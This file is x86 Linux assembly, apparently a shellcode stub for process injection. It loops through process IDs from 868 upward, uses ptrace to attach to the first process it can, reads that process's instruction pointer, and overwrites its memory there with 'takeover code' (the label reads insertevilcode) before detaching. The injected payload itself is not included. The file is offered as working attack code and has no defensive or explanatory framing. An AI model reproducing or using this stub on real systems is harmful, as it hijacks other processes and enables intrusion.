startpid equ 	868
ptrace 	 equ 	26
POKEDATA equ	5
PEEKUSER equ 	3
POKEUSER equ	6
ATTACH 	 equ 	16
DETACH 	 equ 	17
FEIP	 equ	48

; initialize
	xor ecx, ecx
	mov cx, startpid
	xor ebx, ebx

; look for a process
lookforproc:
	xor eax, eax
	xor edx, edx
	inc ecx			; pid
	mov byte bl, ATTACH	; request
	mov byte al, ptrace	; SYSptrace
	int 80h
	cmp eax, edx 		; return == 0?
	jne lookforproc

; We have a process here
	mov esi, esp
	mov byte dl, FEIP	; edx is 4*EIP
				; ecx is the pid from before
	mov byte bl, PEEKUSER	; request

	mov byte al, ptrace	; SYSptrace
	int 80h
	pop edx			; edx is eip of the process

	jmp short code
back:	pop esi			; address of the the takeover code
	mov byte bl, POKEDATA	; request
	cld

insertevilcode:
	xor edi, edi
	lodsd			; load first dword from esi (takeover code) 
				; into eax
	xchg esi, edi		; edi holds address of takeover code
				; and esi is 0
	xchg eax, esi		; eax is 0 and esi is data
				; ecx is still our pid
	not eax			; eax = 0xffffffff
	cmp esi, eax		; data == 0xffffffff?
	not eax			; eax = 0 (not doesn't affect flags)
	je stopinsert

	mov byte al, ptrace     ; SYSptrace
	int 80h
	xchg edi, esi		; esi is takeover code address and edi the data
	add byte dl, 4
	jmp insertevilcode

stopinsert:
; Detach
	xor edx, edx
	xor esi, esi
				; ecx is still our pid
	mov byte bl, DETACH	; request
	mov byte al, ptrace	; SYSptrace
	int 80h

	mov al, 1
	int 80h

code:	call back
